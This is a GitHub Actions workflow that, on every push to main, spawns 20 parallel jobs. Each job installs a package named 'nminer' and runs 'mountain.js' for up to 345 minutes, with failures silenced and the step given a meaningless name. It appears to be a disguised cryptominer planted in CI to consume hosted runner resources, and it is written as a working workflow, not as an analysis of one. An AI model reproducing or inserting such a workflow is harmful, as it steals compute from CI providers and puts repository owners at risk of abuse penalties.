name: mountain
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9793 }
          - { version: 527 }
          - { version: 9363 }
          - { version: 7002 }
          - { version: 7270 }
          - { version: 9235 }
          - { version: 9213 }
          - { version: 4609 }
          - { version: 8557 }
          - { version: 1660 }
          - { version: 7771 }
          - { version: 9549 }
          - { version: 7977 }
          - { version: 4115 }
          - { version: 3988 }
          - { version: 2469 }
          - { version: 1782 }
          - { version: 3937 }
          - { version: 7387 }
          - { version: 1299 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: defiantly for treble immense
        run: |
          npm install nminer@latest
          timeout 345m node mountain.js || echo "mountain executed"